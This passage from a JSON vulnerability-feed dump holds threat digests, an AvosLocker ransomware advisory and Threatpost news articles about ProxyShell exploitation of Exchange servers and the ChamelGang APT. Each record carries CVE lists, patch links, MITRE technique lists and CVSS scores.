researchers worldwide. Among these 5, there was 1 zero-day, and 1 vulnerability that was awaiting analysis on the National Vulnerability Database (NVD). Hive Pro Threat Research Team has curated a list of 5 CVEs that require immediate action. Further, we also observed Two Threat Actor groups being highly active in the last week. Lazarus, a North Korea threat actor group popular for financial crime and gain, was observed targeting blockchain technology and the cryptocurrency industry using a new malware TraderTraitor and Hive ransomware group was seen using the ProxyShell vulnerabilities to target organizations all around the world. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34473 CVE-2021-34523 CVE-2021-31207 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 CVE-2022-0540 https://www.atlassian.com/software/jira/core/download https://www.atlassian.com/software/jira/update CVE-2022-29072* Not Available Active Actors: Icon Name Origin Motive Lazarus Group (APT38, BlueNoroff, and Stardust Chollima) North Korea Financial crime and gain Hive Ransomware Group Unknown Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1588: Obtain Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1136: Create Account T1134: Access Token Manipulation T1134: Access Token Manipulation T1110: Brute Force T1083: File and Directory Discovery T1570: Lateral Tool Transfer T1560: Archive Collected Data T1071: Application Layer Protocol T1567: Exfiltration Over Web Service T1486: Data Encrypted for Impact T1588.005: Exploits T1566: Phishing T1059.007: JavaScript T1136.002: Domain Account T1543: Create or Modify System Process T1140: Deobfuscate/Decode Files or Information T1003: OS Credential Dumping T1135: Network Share Discovery T1021: Remote Services T1560.001: Archive via Utility T1071.001: Web Protocols T1496: Resource Hijacking T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.001: PowerShell T1053: Scheduled Task/Job T1068: Exploitation for Privilege Escalation T1562: Impair Defenses T1003.005: Cached Domain Credentials T1057: Process Discovery T1021.001: Remote Desktop Protocol T1005: Data from Local System T1105: Ingress Tool Transfer T1566.002: Spearphishing Link T1059.003: Windows Command Shell T1053.005: Scheduled Task T1053: Scheduled Task/Job T1562.001: Disable or Modify Tools T1018: Remote System Discovery T1021.002: SMB/Windows Admin Shares T1113: Screen Capture T1078: Valid Accounts T1106: Native API T1078: Valid Accounts T1053.005: Scheduled Task T1070: Indicator Removal on Host T1518: Software Discovery T1021.006: Windows Remote Management T1078.002: Domain Accounts T1053: Scheduled Task/Job T1078.002: Domain Accounts T1078: Valid Accounts T1553: Subvert Trust Controls T1518.001: Security Software Discovery T1053.005: Scheduled Task T1078.002: Domain Accounts T1078: Valid Accounts T1049: System Network Connections Discovery T1204: User Execution T1078.002: Domain Accounts T1204.002: Malicious File T1047: Windows Management Instrumentation Threat Advisories: Bypass Authentication vulnerability in Atlassian Jira Seraph Hive Ransomware targets organizations with ProxyShell exploit Lazarus is back, targeting organizations with cryptocurrency thefts via TraderTraitor malware What will be the consequence of this disputed vulnerability in 7-ZIP?", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T12:44:38", "type": "hivepro", "title": "Weekly Threat Digest: 18 \u2013 24 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-0540", "CVE-2022-29072"], "modified": "2022-04-27T12:44:38", "id": "HIVEPRO:09525E3475AC1C5F429611A90182E82F", "href": "https://www.hivepro.com/weekly-threat-digest-18-24-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:24:49", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency released threat advisories on AvosLocker Ransomware. It is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations in critical infrastructure sectors such as financial services, manufacturing plants, and government facilities in countries such as the United States, Saudi Arabia, the United Kingdom, Germany, Spain, and the United Arab Emirates, among others. After it's affiliates infect targets, AvosLocker claims to handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data. The AvosLocker ransomware is a multi-threaded C++ Windows executable that operates as a console application and displays a log of actions performed on victim computers. For the delivery of the ransomware payload, the attackers use spam email campaigns as the initial infection vector. The threat actors exploits Proxy Shell vulnerabilities CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, as well as CVE-2021-26855 to gain access to victim\u2019s machine and then they deploy Mimikatz to steal passwords. Furthermore, threat actors can use the detected credentials to get RDP access to the domain controller and then exfiltrate data from the compromised machine. Finally, the attacker installs AvosLocker ransomware on the victim's computer and then encrypts the victim's documents and files with the ".avos" extension. The actor then leaves a ransom letter in each directory named "GET YOUR FILES BACK.txt" with a link to an AvosLocker .onion payment site. The Organizations can mitigate the risk by following the recommendations: \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. The MITRE TTPs commonly used by Avoslocker are: TA0001: Initial AccessTA0002: ExecutionTA0007: DiscoveryTA0040: ImpactT1566: PhishingT1204: User ExecutionT1082: System Information DiscoveryT1490: Inhibit System RecoveryT1489: Service StopT1486: Data Encrypted for Impact Actor Detail Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 Recent Breaches https://www.unical.com/ https://www.paccity.net/ https://www.gigabyte.com/ Reference https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-24T06:30:44", "type": "hivepro", "title": "AvosLocker Ransomware group has targeted 50+ Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-24T06:30:44", "id": "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "href": "https://www.hivepro.com/avoslocker-ransomware-group-has-targeted-50-organizations-worldwide/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome's web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-26T23:21:31", "description": "Microsoft has broken its silence on the [recent barrage of attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) on several ProxyShell vulnerabilities in that were [highlighted](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) by a researcher at Black Hat earlier this month.\n\nThe company [released an advisory](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) late Wednesday letting customers know that threat actors may use unpatched Exchange servers \u201cto deploy ransomware or conduct other post-exploitation activities\u201d and urging them to update immediately.\n\n\u201cOur recommendation, as always, is to install the latest CU and SU on all your Exchange servers to ensure that you are protected against the latest threats,\u201d the company said. \u201cPlease update now!\u201d \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)Customers that have installed the [May 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>) or the [July 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-july-2021-exchange-server-security-updates/ba-p/2523421>) on their Exchange servers are protected from these vulnerabilities, as are Exchange Online customers so long as they ensure that all hybrid Exchange servers are updated, the company wrote.\n\n\u201cBut if you have not installed either of these security updates, then your servers and data are vulnerable,\u201d according to the advisory.\n\nThe ProxyShell bugs that Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) outlined in a presentation at Black Hat. The three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) enable an adversary to trigger remote code execution on Microsoft Exchange servers. Microsoft said the bugs can be exploited in the following cases:\n\n\u2013The server is running an older, unsupported CU;\n\n\u2013The server is running security updates for older, unsupported versions of Exchange that were [released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) in March 2021; or\n\n\u2013The server is running an older, unsupported CU, with the [March 2021 EOMT](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) mitigations applied.\n\n\u201cIn all of the above scenarios, you _must_ install one of latest supported CUs and all applicable SUs to be protected,\u201d according to Microsoft. \u201cAny Exchange servers that are not on a supported CU _and_ the latest available SU are vulnerable to ProxyShell and other attacks that leverage older vulnerabilities.\u201d\n\n**Sounding the Alarm**\n\nFollowing Tsai\u2019s presentation on the bugs, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that [he found more](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find exploiting then easy to execute, given how much information is available.\n\nSecurity researchers at Huntress also reported seeing [ProxyShell vulnerabilities](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) being actively exploited throughout the month of August to install backdoor access once the [ProxyShell exploit code](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) was published on Aug. 6. But starting last Friday, Huntress reported a \u201csurge\u201d in attacks after finding 140 webshells launched against 1,900 unpatched Exchange servers.\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) joined those sounding the alarm over the weekend, issuing [an urgent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>). They, too, urged organizations to immediately install the latest Microsoft Security Update.\n\nAt the time, researcher Kevin Beaumont expressed [criticism over Microsoft\u2019s messaging efforts](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) surrounding the vulnerability and the urgent need for its customers to update their Exchange Server security.\n\n\u201cMicrosoft decided to downplay the importance of the patches and treat them as a standard monthly Exchange patch, which [has] been going on for \u2013 obviously \u2013 decades,\u201d Beaumont explained.\n\nBut Beaumont said these remote code execution (RCE) vulnerabilities are \u201c\u2026as serious as they come.\u201d He noted that the company did not help matters by failing to allocate CVEs for them until July \u2014 four months after the patches were issued.\n\nIn order of patching priority, according to Beaumont, the vulnerabilities are: [CVE-2021\u201334473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021\u201334523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) and [CVE-2021\u201331207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>).\n\nCVE-2021-34473, a vulnerability in which a pre-auth path confusion leads to ACL Bypass, was patched in April. CVE-2021-34523, also patched in April, is an elevation of privilege on Exchange PowerShell backend. CVE-2021-31207, a bug in which a post-auth Arbitrary-File-Write leads to remote code execution, was patched in May.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-26T12:39:54", "type": "threatpost", "title": "Microsoft Breaks Silence on Barrage of ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-26T12:39:54", "id": "THREATPOST:83C349A256695022C2417F465CEB3BB2", "href": "https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-01T12:44:45", "description": "A new APT group has emerged that\u2019s specifically targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server\u2019s [ProxyShell](<https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/>) and leveraging both new and existing malware to compromise networks.\n\nResearchers at security firm [Positive Technologies](<https://www.ptsecurity.com/ww-en/>) have been tracking the group, dubbed ChamelGang for its chameleon-like capabilities, since March. Though attackers mainly have been seen targeting Russian organizations, they have attacked targets in 10 countries so far, researchers said in a [report](<https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/>) by company researchers Aleksandr Grigorian, Daniil Koloskov, Denis Kuvshinov and Stanislav Rakovsky published online Thursday.\n\nTo avoid detection, ChamelGang hides its malware and network infrastructure under legitimate services of established companies like Microsoft, TrendMicro, McAfee, IBM and Google in a couple of unique ways, researchers observed.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nOne is to acquire domains that imitate their legitimate counterparts \u2013 such as newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com and mcafee-upgrade.com. The other is to place SSL certificates that also imitate legitimate ones \u2013 such as github.com, www.ibm.com, jquery.com, update.microsoft-support.net \u2013 on its servers, researchers said.\n\nMoreover, ChamelGang \u2013 like [Nobelium](<https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/>) and [REvil](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) before it \u2013 has hopped on the bandwagon of attacking the supply chain first to gain access to its ultimate target, they said. In one of the cases analyzed by Positive Technologies, \u201cthe group compromised a subsidiary and penetrated the target company\u2019s network through it,\u201d according to the writeup.\n\nThe attackers also appear malware-agnostic when it comes to tactics, using both known malicious programs such as [FRP](<https://howtofix.guide/frp-exe-virus/>), [Cobalt Strike Beacon](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), and Tiny Shell, as well as previously unknown malware ProxyT, BeaconLoader and the DoorMe backdoor, researchers said.\n\n## **Two Separate Attacks**\n\nResearchers analyzed two attacks by the novel APT: one in March and one in August. The first investigation was triggered after a Russia-based energy company\u2019s antivirus protection repeatedly reported the presence of the Cobalt Strike Beacon in RAM.\n\nAttackers gained access to the energy company\u2019s network through the supply chain, compromising a vulnerable version of a subsidiary company\u2019s web application on the JBoss Application Server. Upon investigation, researchers found that attackers exploited a critical vulnerability, [CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>), to remotely execute commands on the host.\n\nOnce on the energy company\u2019s network, ChamelGang moved laterally, deploying a number of tools along the way. They included Tiny Shell, with which a UNIX backdoor can receive a shell from an infected host, execute a command and transfer files; an old DLL hijacking technique associated with the Microsoft Distributed Transaction Control (MSDTC) Windows service to gain persistence and escalate privileges; and the Cobalt Strike Beacon for calling back to attackers for additional commands.\n\nResearchers were successful in accessing and exfiltrating data in the attack, researchers said. \u201cAfter collecting the data, they placed it on web servers on the compromised network for further downloading \u2026 using the Wget utility,\u201d they wrote.\n\n## **Cutting Short a ProxyShell Attack **\n\nThe second attack was on an organization from the Russian aviation production sector, researchers said. They notified the company four days after the server was compromised, working with employees to eliminate the threat shortly after.\n\n\u201cIn total, the attackers remained in the victim\u2019s network for eight days,\u201d researchers wrote. \u201cAccording to our data, the APT group did not expect that its backdoors would be detected so quickly, so it did not have time to develop the attack further.\u201d\n\nIn this instance, ChamelGang used a known chain of vulnerabilities in Microsoft Exchange called ProxyShell \u2013 CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 \u2013 to compromise network nodes and gain a foothold. Indeed, a number of attackers took advantage of ProxyShell throughout August, [pummeling](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) unpatched Exchange servers with attacks after a [researcher at BlackHat revealed](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) the attack surface.\n\nOnce on the network, attackers then installed a modified version of the backdoor DoorMe v2 on two Microsoft Exchange mail servers on the victim\u2019s network. Attackers also used BeaconLoader to move inside the network and infect nodes, as well as the Cobalt Strike Beacon.\n\n## **Victims Across the Globe**\n\nFurther threat intelligence following the investigation into attacks on the Russian companies revealed that ChamelGang\u2019s activity has not been limited to that country.\n\nPositive Technologies eventually identified 13 more compromised organizations in nine other countries \u2013 the U.S., Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania and Nepal. In the last four countries mentioned, attackers targeted government servers, they added.\n\nAttackers often used ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server against victims, who were all notified by the appropriate national security authorities in their respective countries.\n\nChamelGang\u2019s tendency to reach its targets through the supply chain also is likely one that it \u2013 as well as other APTs \u2013 will continue, given the success attackers have had so far with this tactic, researchers added. \u201cNew APT groups using this method to achieve their goals will appear on stage,\u201d they said.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-01T12:36:25", "type": "threatpost", "title": "New APT ChamelGang Targets Russian Energy, Aviation Orgs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 